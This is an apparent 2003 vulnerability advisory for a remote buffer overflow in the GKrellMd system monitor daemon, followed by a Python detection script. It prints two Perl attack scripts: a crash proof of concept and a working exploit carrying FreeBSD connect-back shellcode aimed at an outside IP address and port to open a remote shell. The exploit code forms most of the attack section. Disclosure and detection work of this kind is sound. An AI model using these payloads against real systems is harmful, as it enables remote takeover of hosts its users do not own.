Gkrellmd Remote Buffer Overflow Vulnerability
Published: 2003-06-25
Updated: 2003-06-25
Severity: High
Threat: Remote administrator privileges
Error type: Boundary check error
Exploitation: Server mode
BUGTRAQ ID: 8022

Affected systems
GKrellM GKrellM 2.1.13

Detailed description
GKrellMd is a system performance monitor. When processing network packets, GKrellMd does not adequately bounds-check the incoming data, which leads to a buffer overflow; a remote attacker could exploit this to execute arbitrary instructions on the host running GKrellMd. This vulnerability is reported to affect Gkrellm 2.1.13.

Test code

#!/usr/bin/perl -s
use IO::Socket;
#
# proof of concept code
# tested: grkellmd 2.1.10
#
if(!$ARGV[0] || !$ARGV[1]) {
    print "usage: ./gkrellmcrash.pl <host> <port>\n";
    exit(-1);
}
$host = $ARGV[0];
$port = $ARGV[1];
$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$socket = new IO::Socket::INET (
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "gkrellm 2.1.10\n"; # tell the daemon which client we have
sleep(1);
print $socket $exploitstring;
close($socket);

#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.
use IO::Socket;
if(!$ARGV[0] || !$ARGV[1]) {
    print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n";
    exit(-1);
}
$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
#--> connect-back to a useless ip, change it:) ^^217.157.38.38^ ^^10000^
$nop = "\x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;
$socket = new IO::Socket::INET (
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "gkrellm 2.1.10\n"; # tell the daemon which client we have
sleep(1); # might have to adjust this on slow connections
print $socket $buf;
close($socket);

Solution
The vendor has not yet provided a solution.

Related information
Gkrellmd 2.1.10 remote exploit (buffer overflow)
http://packetstormsecurity.nl/0306-exploits/gkrellmd
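As an added detection example, not part of this advisory or of the exploit authors' code, the following Python inspects the client-to-server half of a captured gkrellmd session: it checks for the "gkrellm <version>" greeting that both scripts above send first, then flags any later line that is oversized or consists of a long run of a single byte, which is the shape of the padding and NOP sled used above. The 128-byte line limit and the 32-byte run length are assumptions chosen from the sizes in those scripts, not limits documented by the gkrellmd protocol, and the sample streams are constructed, not captured traffic.

```python
import re
from typing import List, Tuple

# Assumed thresholds, chosen from the sizes used in the scripts above (128 bytes
# of padding, a 500-byte NOP sled); they are not documented gkrellmd protocol limits.
MAX_LINE_LEN = 128
MAX_RUN_LEN = 32

# Client greeting sent by both scripts above: "gkrellm <version>" on its own line.
GREETING = re.compile(rb"^gkrellm [0-9]+(\.[0-9]+)*$")

# Constructed sample streams, not captured traffic: a benign session and one
# shaped like the proof of concept above (greeting, then a long run of 'A's).
BENIGN_STREAM = b"gkrellm 2.1.10\nshort line\n"
POC_SHAPED_STREAM = b"gkrellm 2.1.10\n" + b"A" * 140


def longest_byte_run(data: bytes) -> Tuple[int, int]:
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best_byte, best_len = -1, 0
    cur_byte, cur_len = -1, 0
    for b in data:
        if b == cur_byte:
            cur_len += 1
        else:
            cur_byte, cur_len = b, 1
        if cur_len > best_len:
            best_byte, best_len = cur_byte, cur_len
    return best_byte, best_len


def inspect_client_stream(stream: bytes) -> List[str]:
    """Inspect the client-to-server half of a gkrellmd TCP session and return
    findings (empty list = nothing flagged). A trailing fragment without a
    newline is inspected too, since the payloads above end without one."""
    findings: List[str] = []
    lines = stream.split(b"\n")
    if not GREETING.match(lines[0]):
        findings.append("first line is not a 'gkrellm <version>' greeting")
        return findings
    for idx, line in enumerate(lines[1:], start=2):
        if not line:
            continue
        if len(line) > MAX_LINE_LEN:
            findings.append(f"line {idx}: length {len(line)} exceeds {MAX_LINE_LEN}")
        byte, run = longest_byte_run(line)
        if run >= MAX_RUN_LEN:
            findings.append(f"line {idx}: byte 0x{byte:02x} repeated {run} times")
    return findings
```

Run it over the client side of a reassembled TCP stream for port 19150; a non-empty result on a host still running an unpatched GKrellMd is worth an alert, since the advisory offers no vendor fix.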